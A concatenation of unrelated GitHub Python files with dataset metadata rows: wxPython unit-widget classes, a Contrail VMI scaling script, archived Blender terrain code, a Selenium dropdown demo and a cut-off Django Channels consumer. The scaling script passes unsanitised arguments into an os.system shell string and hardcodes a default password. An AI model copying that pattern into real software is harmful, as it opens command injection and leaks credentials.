Event handler to store the current selection
:param:
"""
self.current_dropbox_selection = self.GetCurrentSelection()
def is_selection_change(self):
"""
Check if the dropbox selection different from the previous selection before the dropbox is open.
:return: boolean
"""
if self.current_dropbox_selection is self.GetSelection():
return False
else:
return True
def append(self, label, obj):
"""
Append data into combobox.
:param label: title
:param obj: object data
:return:
"""
self.Append(label, obj)
def set_selection_by_data(self, value):
"""
Set the selection given the data input.
:param value:
:return:
"""
for index, text in enumerate(self.Strings):
if self.HasClientData():
if self.GetClientData(index) == value:
self.SetSelection(index)
# Leave loop
return
def get_data(self):
"""
Get the data.
:return:
"""
if self.GetSelection() == -1:
return None
else:
return self.GetClientData(self.GetSelection())
def set_value(self, value):
# type: (object) -> object
"""
Set the value
:param value: string
:return:
"""
self.Value = str(value)
def get_value(self):
"""
Get the combobox value
:return:
"""
return self.Value
def activate(self):
"""
Activate Units.
:return:
"""
self.Clear()
self.AppendItems(self.unit.get_list())
self.SetSelection(self.unit.get_default_selection())
self.convert = self.unit.get_conversion_factor
def activate_acceleration(self, *args, **kwargs):
"""
Activate acceleration unit.
:param args:
:param kwargs:
:return:
"""
self.unit = AccelerationUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_angle(self, *args, **kwargs):
"""
Activate angle unit
:param args:
:param kwargs:
:return:
"""
self.unit = AngleUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_area_density(self, *args, **kwargs):
"""
Activate area density unit.
:param args:
:param kwargs:
:return:
"""
self.unit = AreaDensityUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_area(self, *args, **kwargs):
"""
Activate area unit.
:param kwargs:
"""
self.unit = AreaUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_charge(self, *args, **kwargs):
"""
Activate charge weight.
:param kwargs:
"""
self.unit = ChargeUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_density(self, *args, **kwargs):
"""
Activate density unit.
:param args:
:param kwargs:
"""
self.unit = DensityUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_force(self, *args, **kwargs):
"""
Active force unit.
:param args:
:param kwargs:
:return:
"""
self.unit = ForceUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_inertia(self, *args, **kwargs):
"""
Activate Inertia unit.
:param args:
:param kwargs:
"""
self.unit = InertiaUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_length(self, *args, **kwargs):
"""
Activate length unit.
:param args:
:param kwargs:
"""
self.unit = LengthUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_linear_density(self, *args, **kwargs):
"""
Activate linear density unit.
:param args:
:param kwargs:
:return:
"""
self.unit = LinearDensityUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_linear_pressure(self, *args, **kwargs):
"""
Activate linear pressure unit.
:param args:
:param kwargs:
:return:
"""
self.unit = LinearPressureUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_mass(self, *args, **kwargs):
"""
Activate mass units.
:param kwargs:
"""
self.unit = MassUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_pressure(self, *args, **kwargs):
"""
Activate pressure unit.
:param kwargs:
"""
self.unit = PressureUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_time(self, *args, **kwargs):
"""
Activate time unit.
:param args:
:param kwargs:
:return:
"""
self.unit = TimeUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_tnt(self, *args, **kwargs):
"""
Activate tnt unit.
:param args:
:param kwargs:
"""
self.unit = TntUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_torque(self, *args, **kwargs):
"""
Activate Torque unit.
:param args:
:param kwargs:
"""
self.unit = TorqueUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_velocity(self, *args, **kwargs):
"""
Activate Velocity unit.
:param args:
:param kwargs:
:return:
"""
self.unit = VelocityUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def activate_volume(self, *args, **kwargs):
"""
Activate volume unit.
:param args:
:param kwargs:
"""
self.unit = VolumeUnit(*args, **kwargs)
if kwargs.get('unit_list'):
unit_list = kwargs.get('unit_list')
self.unit.metric_list = unit_list['metric']
self.unit.imperial_list = unit_list['imperial']
self.unit.unit_system = self.unit_system
self.activate()
def get_factor(self, origin, destination):
"""
Get the factor.
:param origin: origin unit
:param destination: destination unit
"""
return self.convert(origin, destination)
def check_requirement(self):
"""
Check if the textbox has value
:return:
"""
if self.required:
if self.Enabled:
if self.get_value() is None:
return False
else:
return True
else:
# If textbox is not active, than it's not required.
return True
else:
# If not required, than return true.
return True
class SmartInputLayout(wx.BoxSizer):
"""
Create the horizontal layout of smart textbox.
/---------------- OVERALL WIDTH ----------------------/
| |
| |
******************************************************* ----/
* * * * * * * * |
******************************************************* |
* * * * * * * *
* * (1) * * (2) * * (3) * * OVERALL HEIGHT
* * * * * * * *
******************************************************* |
* * * * * * * * |
******************************************************* ----/
"""
MAKE_VERTICAL_STRETCHABLE = 1
def __init__(self, parent, max=None, min=None, layout=None, label=None, *args, **kwargs):
"""
Constructor.
:param parent:
:param width:
:param max: maximum value for the textbox
:param min: minimum value for the textbox
:param layout:
:param label: pass in wx.Label or SmartLabel
:param args:
:param kwargs:
"""
wx.BoxSizer.__init__(self, wx.VERTICAL)
self.components = []
self.parent = parent
self.hsizer = None
self._next_id = 0
self.INDEX_LABEL = None
self.INDEX_TEXTBOX = None
self.INDEX_POSTBOX = None
self.INDEX_COMBOBOX = None
self.INDEX_BUTTON = None
if layout:
self.layout = layout
else:
self.layout = LayoutDimensions()
self.layout.calculate()
# Add in the label.
if label:
self.label = label
elif kwargs.get('name'):
self.label = SmartLabel(self.parent, label=kwargs.get('name'))
else:
self.label = None
self.min = min
self.max = max
# Set minimum size.
size = self.GetSize()
size.Height = self.layout.overall_height
self.SetMinSize(size)
def rename(self, name=None):
"""
Rename
:param name:
:return:
"""
self.label = wx.StaticText(self.parent, label=name)
@property
def next_id(self):
"""
:return:
"""
nid = self._next_id
self._next_id += 1
return nid
@property
def label(self):
"""
:return:
"""
if self.INDEX_LABEL is None:
return None
return self.components[self.INDEX_LABEL]
@label.setter
def label(self, value):
"""
:param value:
:return:
"""
if value is None:
return
self.INDEX_LABEL = self.next_id
self.components.append(value)
@property
def textbox(self):
"""
:return:
"""
if self.INDEX_TEXTBOX is None:
return None
return self.components[self.INDEX_TEXTBOX]
@textbox.setter
def textbox(self, value):
"""
:param value:
:return:
"""
if value is None:
return
self.INDEX_TEXTBOX = self.next_id
self.components.append(value)
@property
def postbox(self):
"""
:return:
"""
if self.INDEX_POSTBOX is None:
return None
return self.components[self.INDEX_POSTBOX]
@postbox.setter
def postbox(self, value):
"""
:param value:
:return:
"""
if value is None:
return
self.INDEX_POSTBOX = self.next_id
self.components.append(value)
@property
def combobox(self):
"""
:return:
"""
if self.INDEX_COMBOBOX is None:
return None
return self.components[self.INDEX_COMBOBOX]
@combobox.setter
def combobox(self, value):
"""
:param value:
:return:
"""
if value is None:
return
self.INDEX_COMBOBOX = self.next_id
self.components.append(value)
def do_layout(self):
"""
Do Layout.
:return:
"""
# Start with the vertical margin.
self.AddSpacer(self.layout.top)
# Move from left to right.
self.hsizer = wx.BoxSizer(wx.HORIZONTAL)
# self.hsizer.SetMinSize(wx.Size(self.layout.overall_width, self.layout.height))
self.hsizer.AddSpacer(self.layout.left)
for id in range(0, len(self.components)):
"""
wx.BoxSizer.Add(window, proportion=0, flag=0, border=0, userData=None)
Append a child to the sizer
:param window: a window, a spacer or another sizer to be added to the sizer. Its initial size
(either set explicitly by the user or calculated internally) is interpreted as the minimal and
in many cases also the initial size.
:param proportion: (int) the parameter is used in wx.BoxSizer to indicate if a child of a sizer can
change its size in the main orientation of the wx.BoxSizer - where 0 stands for non changeable
and a value of more than zero is interpreted relative to the value of other children of the
same wx.BosSizer. For example, you might have a horizontal wx.BoxSizer with three children,
two of which are supposed to change their size with the sizer. Then the two stretchable
windows would get a value of 1 each to make item grow and shrink equally with the sizer's
horizontal dimension.
:param flag: (int): combinations of flags affecting sizer's behavior
:param border: (int): determines the border width, if the flag parameter is set to include any
border flag
:param userData: (object) allows an extra object to be attached to the sizer item, for use in
derived classes when sizing information
"""
self.components[id].SetMinSize(self.layout.get_size(id))
self.hsizer.AddSpacer(self.layout.interior)
self.hsizer.Add(self.components[id],
self.layout.stretch_factor[id],
wx.ALL | wx.EXPAND,
self.layout.border_width[id])
# Add blank space if no component exists.
for id_blank in range(id+1, len(self.layout.widths)):
self.hsizer.AddSpacer(self.layout.interior)
blank_label = wx.StaticText(self.parent, label="")
blank_label.SetMinSize(self.layout.get_size(id_blank))
self.hsizer.Add(blank_label,
self.layout.stretch_factor[id_blank],
wx.ALL | wx.EXPAND,
self.layout.border_width[id_blank])
self.hsizer.AddSpacer(self.layout.right)
self.Add(self.hsizer, 1, wx.EXPAND | wx.ALL, 0)
self.AddSpacer(self.layout.bottom)
def add(self, item, proportion=0, flag=0, border=0, userData=None):
"""
Appends a child item to the sizer.
:param item: The item can be one of three kind of objects:
* window: A wx.Window to be managed by the sizer. Its minimal size (either set explicitly by the user or
calculated internally when constructed with wx.DefaultSize) is interpreted as the minimal size to use
when laying out item in the sizer. This is particularly useful in connection with
wx.Window.SetSizeHints.
* sizer: The (child-)sizer to be added to the sizer. This allows placing a child sizer in a sizer and thus
to create hierarchies of sizers (for example a vertical box as the top sizer and several horizontal
boxes on the level beneath).
* size: A wx.Size or a 2-element sequence of integers that represents the width and height of a spacer to
be added to the sizer. Adding spacers to sizers gives more flexibility in the design of dialogs;
imagine for example a horizontal box with two buttons at the bottom of a dialog: you might want to
insert a space between the two buttons and make that space stretchable using the proportion value and
the result will be that the left button will be aligned with the left side of the dialog and the right
button with the right side - the space in between will shrink and grow with the dialog.
:param proportion: Although the meaning of this parameter is undefined in wx.Sizer, it is used in wx.BoxSizer
to indicate if a child of a sizer can change its size in the main orientation of the wx.BoxSizer - where 0
stands for not changeable and a value of more than zero is interpreted relative (a proportion of the total)
to the value of other children of the same wx.BoxSizer. For example, you might have a horizontal
wx.BoxSizer with three children, two of which are supposed to change their size with the sizer. Then the
two stretchable windows should each be given proportion value of 1 to make them grow and shrink equally
with the sizer's horizontal dimension. But if one of them had a proportion value of 2 then it would get a
double share of the space available after the fixed size items are positioned.
(type int)
:param flag: This parameter can be used to set a number of flags which can be combined using the binary OR
operator |. Two main behaviours are defined using these flags. One is the border around a window: the
border parameter determines the border width whereas the flags given here determine which side(s) of the
item that the border will be added. The other flags determine how the sizer item behaves when the space
allotted to the sizer changes, and is somewhat dependent on the specific kind of sizer used.
* wx.TOP
* wx.BOTTOM
* wx.LEFT
* wx.RIGHT
* wx.ALL
* wx.EXPAND
* wx.SHAPED
* wx.FIXED_MINSIZE
* wx.ALIGN_CENTER
* wx.ALIGN_LEFT
* wx.ALIGN_RIGHT
* wx.ALIGN_TOP
* wx.ALIGN_BOTTOM
* wx.ALIGN_CENTER_VERTICAL
* wx.ALIGN_CENTER_HORIZONTAL
(type int)
:param border: Determines the border width, if the flag parameter is set to include any border flag.
(type int)
:param userData: Allows an extra object to be attached to the sizer item, for use in derived classes when
sizing information is more complex than the proportion and flag will allow for.
(type=PyObject)
"""
self.Add(item, proportion, flag, border, userData)
def add_stretch_spacer(self, prop=1):
"""
Add a stretchable spacer.
:param prop:
:return:
"""
self.AddStretchSpacer(prop=prop)
def add_spacer(self, size):
"""
Add a spacer that is (size, size) pixels.
:param size:
:return:
"""
self.AddSpacer(size)
def fit(self, window):
"""
Tell the sizer to resize the window to match the sizer's minimal size. This is commonly done in the constructor
of the window itself in order to set its initial size to match the needs of the children as determined by the
sizer. Returns the new size.
For a top level window this is the total window size, not the client size.
:param window:
:return:
"""
self.Fit(window)
def enable(self):
"""
Must inherit enable input layout.
"""
pass
def disable(self):
"""
Must inherit disable input layout.
"""
pass
def validate(self):
"""
Must inherit validate().
"""
pass
def check_requirement(self):
"""
Check requirement
:return:
"""
requirement_satisfy = True
for item in self.components:
if hasattr(item, 'check_requirement'):
if item.check_requirement() is False:
requirement_satisfy = False
return requirement_satisfy
class SmartButton(wx.Button):
"""
Smarter Button Class
"""
def __init__(self, parent, label='', evt_button=None, message=None, enable=None, helptext=None, *args, **kwargs):
"""
Constructor.
:param parent:
:param label:
:param evt_button:
:param message:
:param enable:
:param helptext:
:param args:
:param kwargs:
:return:
"""
wx.Button.__init__(self, parent, label=label, *args, **kwargs)
if evt_button:
self.Bind(wx.EVT_BUTTON, evt_button)
self.tooltip = None
if message:
self.tooltip = wx.ToolTip(message)
self.SetToolTip(self.tooltip)
if helptext:
self.SetHelpText(helptext)
if enable is not None:
self.Enable(enable)
class SmartCheckBox(wx.CheckBox):
"""
**Smarter CheckBox**
"""
def __init__(self, parent, id=-1, label='', evt_click=None, message=None, enable=None, helptext=None,
*args, **kwargs):
"""
Constructor.
:param parent:
:param id:
:param label:
:param evt_click:
:param message:
:param helptext:
:param args:
:param kwargs:
:return:
"""
wx.CheckBox.__init__(self, parent, id=id, label=label, *args, **kwargs)
self.tooltip = None
if message:
self.tooltip = wx.ToolTip(message)
self.SetToolTip(self.tooltip)
if evt_click:
self.Bind(wx.EVT_CHECKBOX, evt_click)
if helptext:
self.SetHelpText(helptext)
if enable is not None:
self.Enable(enable)
def bind_click(self, handle):
"""
Bind check box click.
:param handle:
:return:
"""
self.Bind(wx.EVT_CHECKBOX, handle)
def get_value(self):
"""
Return the true/false
:return:
"""
return self.Value
def set_value(self, value):
# type: (object) -> object
self.SetValue(value)
| JoenyBui/boa-gui | boaui/textbox/smart.py | smart.py | py | 36,235 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "wx.TextCtrl",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "wx.TextCtrl.__init__",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "wx.TextCtrl",
"line_number": 73,
"usage_type": "attribute"
},
{
"api_name": "wx.EVT_KEY_UP"... |
7918280184 | import os
import sys
import argparse
import netaddr
from netaddr import EUI
def _parse_args( args_str):
parser = argparse.ArgumentParser()
args, remaining_argv = parser.parse_known_args(args_str.split())
parser.add_argument(
"--username", nargs='?', default="admin",help="User name")
parser.add_argument(
"--password", nargs='?', default="contrail123",help="password")
parser.add_argument(
"--tenant_id", nargs='?', help="trnant id",required=True)
parser.add_argument(
"--config_node_port", help="config node port")
parser.add_argument(
"--config_node_ip", help="config node ip",required=True)
parser.add_argument(
"--physical_router_id", help="Physical router id")
parser.add_argument(
"--start_mac", help="Mac address of vcenter vm ",required=True)
parser.add_argument(
"--start_vn_name", help="Vn name to launch vmi",required=True)
parser.add_argument(
"--start_vlan", help="Initial vlan",required=True)
parser.add_argument(
"--number_of_vlan", help="number of vlans to be created",required=True)
parser.add_argument(
"--auth_url", nargs='?', default="check_string_for_empty",help="Auth Url",required=True)
args = parser.parse_args(remaining_argv)
return args
def get_mac_address_iter_obj(mac,start_range,end_range):
return iter(["{:012X}".format(int(mac, 16) + x) for x in range(int(start_range),int(end_range)+1)])
def get_subnet_iter_obj(subnet='1.1.1.0/24'):
addr,prefix = subnet.split('/')
ad1,ad2,ad3,ad4 = addr.split('.')
return iter([ad1+'.'+str(int(ad2)+x)+'.'+str(int(ad3)+y)+'.'+ad4+'/'+prefix for x in range(1,250) for y in range(1,250)])
def get_subnet_iter_obj_for_static_route(subnet='1.1.1.0/24'):
addr,prefix = subnet.split('/')
ad1,ad2,ad3,ad4 = addr.split('.')
return iter([str(int(ad1)+x)+'.'+ad2+'.'+ad3+'.'+ad4+'/'+prefix for x in range(1,250)])
def get_vn_name(base_vn_name,counter):
return base_vn_name + str(counter)
def get_vlan_range(start_vlan,numbers):
vlan_range=[]
end_vlan= int(start_vlan) + int(numbers)
for x in range(int(start_vlan),int(end_vlan)+1):
vlan_range.append(str(x))
return vlan_range
def main(args_str = None):
if not args_str:
script_args = ' '.join(sys.argv[1:])
script_args = _parse_args(script_args)
start_vlan = script_args.start_vlan
number_of_vlan = script_args.number_of_vlan
vlans = get_vlan_range(start_vlan,number_of_vlan)
mac = get_mac_address_iter_obj(script_args.start_mac,'0',number_of_vlan)
subnet = get_subnet_iter_obj()
static_route_subnet = get_subnet_iter_obj_for_static_route(subnet='2.0.1.0/24')
for vlan in vlans:
try:
m_addr = mac.next()
sub = subnet.next()
static_route_sub = static_route_subnet.next()
except StopIteration:
return
vn_name = get_vn_name(script_args.start_vn_name,vlan)
os.system("python vmi.py --static_route_subnet %s\
--tenant_id %s\
--config_node_ip %s\
--vcenter_vm_mac %s\
--vn_name %s\
--subnet %s\
--auth_url %s"
%(static_route_sub,
script_args.tenant_id,
script_args.config_node_ip,
m_addr,vn_name,sub,
script_args.auth_url
)
)
#python vmi_scale.py --tenant_id 74ebcac4-21da-4fe3-8c7f-e84c9e0424ca --config_node_ip 192.168.192.60 --start_mac 000029572113 --start_vn_name tor_vn_ --start_vlan 6 --number_of_vlan 7 --auth_url http://10.204.217.144:5000/v2.0
if __name__ == "__main__":
main()
| sandip-d/scripts | vmi_scale.py | vmi_scale.py | py | 3,983 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 61,
"usage_type": "attribute"
},
{
"api_name": "os.system",
"line_number": 77,
"usage_type": "call"
}
] |
31267028151 | ## Archived on the 22/09/2021
## Original terrain.py lived at io_ogre/terrain.py
import bpy
def _get_proxy_decimate_mod( ob ):
proxy = None
for child in ob.children:
if child.subcollision and child.name.startswith('DECIMATED'):
for mod in child.modifiers:
if mod.type == 'DECIMATE':
return mod
def bake_terrain( ob, normalize=True ):
assert ob.collision_mode == 'TERRAIN'
terrain = None
for child in ob.children:
if child.subcollision and child.name.startswith('TERRAIN'):
terrain = child
break
assert terrain
data = terrain.to_mesh(bpy.context.scene, True, "PREVIEW")
raw = [ v.co.z for v in data.vertices ]
Zmin = min( raw )
Zmax = max( raw )
depth = Zmax-Zmin
m = 1.0 / depth
rows = []
i = 0
for x in range( ob.collision_terrain_x_steps ):
row = []
for y in range( ob.collision_terrain_y_steps ):
v = data.vertices[ i ]
if normalize:
z = (v.co.z - Zmin) * m
else:
z = v.co.z
row.append( z )
i += 1
if x%2:
row.reverse() # blender grid prim zig-zags
rows.append( row )
return {'data':rows, 'min':Zmin, 'max':Zmax, 'depth':depth}
def save_terrain_as_NTF( path, ob ): # Tundra format - hardcoded 16x16 patch format
info = bake_terrain( ob )
url = os.path.join( path, '%s.ntf' % clean_object_name(ob.data.name) )
f = open(url, "wb")
# Header
buf = array.array("I")
xs = ob.collision_terrain_x_steps
ys = ob.collision_terrain_y_steps
xpatches = int(xs/16)
ypatches = int(ys/16)
header = [ xpatches, ypatches ]
buf.fromlist( header )
buf.tofile(f)
# Body
rows = info['data']
for x in range( xpatches ):
for y in range( ypatches ):
patch = []
for i in range(16):
for j in range(16):
v = rows[ (x*16)+i ][ (y*16)+j ]
patch.append( v )
buf = array.array("f")
buf.fromlist( patch )
buf.tofile(f)
f.close()
path,name = os.path.split(url)
R = {
'url':url, 'min':info['min'], 'max':info['max'], 'path':path, 'name':name,
'xpatches': xpatches, 'ypatches': ypatches,
'depth':info['depth'],
}
return R
class OgreCollisionOp(bpy.types.Operator):
'''Ogre Collision'''
bl_idname = "ogre.set_collision"
bl_label = "modify collision"
bl_options = {'REGISTER'}
MODE = StringProperty(name="toggle mode", maxlen=32, default="disable")
@classmethod
def poll(cls, context):
if context.active_object and context.active_object.type == 'MESH':
return True
def get_subcollisions( self, ob, create=True ):
r = get_subcollisions( ob )
if not r and create:
method = getattr(self, 'create_%s'%ob.collision_mode)
p = method(ob)
p.name = '%s.%s' %(ob.collision_mode, ob.name)
p.subcollision = True
r.append( p )
return r
def create_DECIMATED(self, ob):
child = ob.copy()
bpy.context.scene.collection.objects.link( child )
child.matrix_local = mathutils.Matrix()
child.parent = ob
child.hide_select = True
child.draw_type = 'WIRE'
#child.select = False
child.lock_location = [True]*3
child.lock_rotation = [True]*3
child.lock_scale = [True]*3
decmod = child.modifiers.new('proxy', type='DECIMATE')
decmod.ratio = 0.5
return child
def create_TERRAIN(self, ob):
x = ob.collision_terrain_x_steps
y = ob.collision_terrain_y_steps
#################################
#pos = ob.matrix_world.to_translation()
bpy.ops.mesh.primitive_grid_add(
x_subdivisions=x,
y_subdivisions=y,
size=1.0 ) #, location=pos )
grid = bpy.context.active_object
assert grid.name.startswith('Grid')
grid.collision_terrain_x_steps = x
grid.collision_terrain_y_steps = y
#############################
x,y,z = ob.dimensions
sx,sy,sz = ob.scale
x *= 1.0/sx
y *= 1.0/sy
z *= 1.0/sz
grid.scale.x = x/2
grid.scale.y = y/2
grid.location.z -= z/2
grid.data.show_all_edges = True
grid.draw_type = 'WIRE'
grid.hide_select = True
#grid.select = False
grid.lock_location = [True]*3
grid.lock_rotation = [True]*3
grid.lock_scale = [True]*3
grid.parent = ob
bpy.context.scene.objects.active = ob
mod = grid.modifiers.new(name='temp', type='SHRINKWRAP')
mod.wrap_method = 'PROJECT'
mod.use_project_z = True
mod.target = ob
mod.cull_face = 'FRONT'
return grid
def invoke(self, context, event):
ob = context.active_object
game = ob.game
subtype = None
if ':' in self.MODE:
mode, subtype = self.MODE.split(':')
##BLENDERBUG##ob.game.collision_bounds_type = subtype # BUG this can not come before
if subtype in 'BOX SPHERE CYLINDER CONE CAPSULE'.split():
ob.draw_bounds_type = subtype
else:
ob.draw_bounds_type = 'POLYHEDRON'
ob.game.collision_bounds_type = subtype # BLENDERBUG - this must come after draw_bounds_type assignment
else:
mode = self.MODE
ob.collision_mode = mode
if ob.data.show_all_edges:
ob.data.show_all_edges = False
if ob.show_texture_space:
ob.show_texture_space = False
if ob.show_bounds:
ob.show_bounds = False
if ob.show_wire:
ob.show_wire = False
for child in ob.children:
if child.subcollision and not child.hide_viewport:
child.hide_viewport = True
if mode == 'NONE':
game.use_ghost = True
game.use_collision_bounds = False
elif mode == 'PRIMITIVE':
game.use_ghost = False
game.use_collision_bounds = True
ob.show_bounds = True
elif mode == 'MESH':
game.use_ghost = False
game.use_collision_bounds = True
ob.show_wire = True
if game.collision_bounds_type == 'CONVEX_HULL':
ob.show_texture_space = True
else:
ob.data.show_all_edges = True
elif mode == 'DECIMATED':
game.use_ghost = True
game.use_collision_bounds = False
game.use_collision_compound = True
proxy = self.get_subcollisions(ob)[0]
if proxy.hide_viewport: proxy.hide_viewport = False
ob.game.use_collision_compound = True # proxy
mod = _get_proxy_decimate_mod( ob )
mod.show_viewport = True
if not proxy.select: # ugly (but works)
proxy.hide_select = False
proxy.select = True
proxy.hide_select = True
if game.collision_bounds_type == 'CONVEX_HULL':
ob.show_texture_space = True
elif mode == 'TERRAIN':
game.use_ghost = True
game.use_collision_bounds = False
game.use_collision_compound = True
proxy = self.get_subcollisions(ob)[0]
if proxy.hide_viewport:
proxy.hide_viewport = False
elif mode == 'COMPOUND':
game.use_ghost = True
game.use_collision_bounds = False
game.use_collision_compound = True
else:
assert 0 # unknown mode
return {'FINISHED'}
| OGRECave/blender2ogre | archived_code/terrain.py | terrain.py | py | 7,840 | python | en | code | 187 | github-code | 6 | [
{
"api_name": "bpy.context",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "bpy.types",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_name": "bpy.context.scene.collection.objects.link",
"line_number": 104,
"usage_type": "call"
},
{
"api_na... |
26159783505 | # Bootstrap dropdown doesn't have select tag
# inspect the dropdown, find all the li under ui tag
# Loop through it and click the right li
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
# Launch the browser
service_obj = Service("C:\Drivers\chromedriver_win32\chromedriver.exe")
driver = webdriver.Chrome(service=service_obj)
driver.implicitly_wait(10)
# Open the web application
driver.get("https://www.dummyticket.com/dummy-ticket-for-visa-application/")
driver.maximize_window()
driver.find_element(By.XPATH, "//span[@id='select2-billing_country-container']").click()
countries_list = driver.find_elements(By.XPATH, "//ul[@id='select2-billing_country-results']/li")
print(len(countries_list))
for country in countries_list:
if country.text == "India":
country.click()
break
| skk99/Selenium | day13/BootstrapDropdown.py | BootstrapDropdown.py | py | 915 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "selenium.webdriver.chrome.service.Service",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 11,
"usage_type": "name"
},
{... |
71839381629 | # coding=utf-8
from __future__ import print_function
from ActionSpace import settings
from om.util import update_from_salt, syn_data_outside, fmt_salt_out, check_computer
from om.models import CallLog
from django.contrib.auth.models import User, AnonymousUser
from om.proxy import Salt
from channels.generic.websockets import JsonWebsocketConsumer
from om.models import SaltMinion
from utils.util import CheckFireWall
import traceback
import re
class OmConsumer(JsonWebsocketConsumer):
http_user = True
def raw_connect(self, message, **kwargs):
user = 'unknown'
# noinspection PyBroadException
try:
not_login_user = User.objects.get_or_create(username='not_login_yet', is_active=False)[0]
user = not_login_user if isinstance(message.user, AnonymousUser) else message.user
except Exception as e:
settings.logger.error(repr(e))
CallLog.objects.create(
user=user,
type='message',
action=message['path'],
detail=message.content
)
settings.logger.info('recv_data:{data}'.format(data=message.content, path=message['path']))
super(OmConsumer, self).raw_connect(message, **kwargs)
def receive(self, content, **kwargs):
try:
CallLog.objects.create(
user=User.objects.get(username=self.message.user.username),
type='message',
action=self.message['path'],
detail=self.message.content
)
except Exception as e:
settings.logger.error(repr(e))
try:
settings.logger.error(self.message.user.username)
except Exception as e:
settings.logger.error(repr(e))
settings.logger.info('recv_data:{data}'.format(data=content, path=self.message['path']))
super(OmConsumer, self).receive(content, **kwargs)
class SaltConsumer(OmConsumer):
def receive(self, content, **kwargs):
super(SaltConsumer, self).receive(content, **kwargs)
if not self.message.user.is_authenticated:
self.send({'result': '未授权,请联系管理员!'})
return
if not self.message.user.is_superuser:
self.send({'result': '仅管理员有权限执行该操作!'})
return
info = content.get('info', '')
if info == 'refresh-server':
update_from_salt(None if settings.OM_ENV == 'PRD' else 'UAT')
self.send({'result': 'Y', 'info': 'refresh-server'})
elif info == 'check_computer':
self.send({'return': check_computer(), 'info': 'check_computer'})
else:
self.send({'result': '未知操作!'})
class ServerConsumer(OmConsumer):
def receive(self, content, **kwargs):
super(ServerConsumer, self).receive(content, **kwargs)
if not self.message.user.is_authenticated:
self.send({'result': '未授权,请联系管理员!'})
return
if not self.message.user.is_superuser:
self.send({'result': '仅管理员有权限执行该操作!'})
return
if content.get('info', None) != 'syn_data_outside':
self.send({'result': '未知操作!'})
return
syn_data_outside()
self.send({'result': 'Y'})
class ActionDetailConsumer(OmConsumer):
group_prefix = 'action_detail-'
yes = {"result": 'Y'}
no = {"result": 'N'}
def label(self):
reg = r'^/om/action_detail/(?P<task_id>[0-9]+)/$'
task_id = re.search(reg, self.message['path']).group('task_id')
return f'{self.group_prefix}{task_id}'
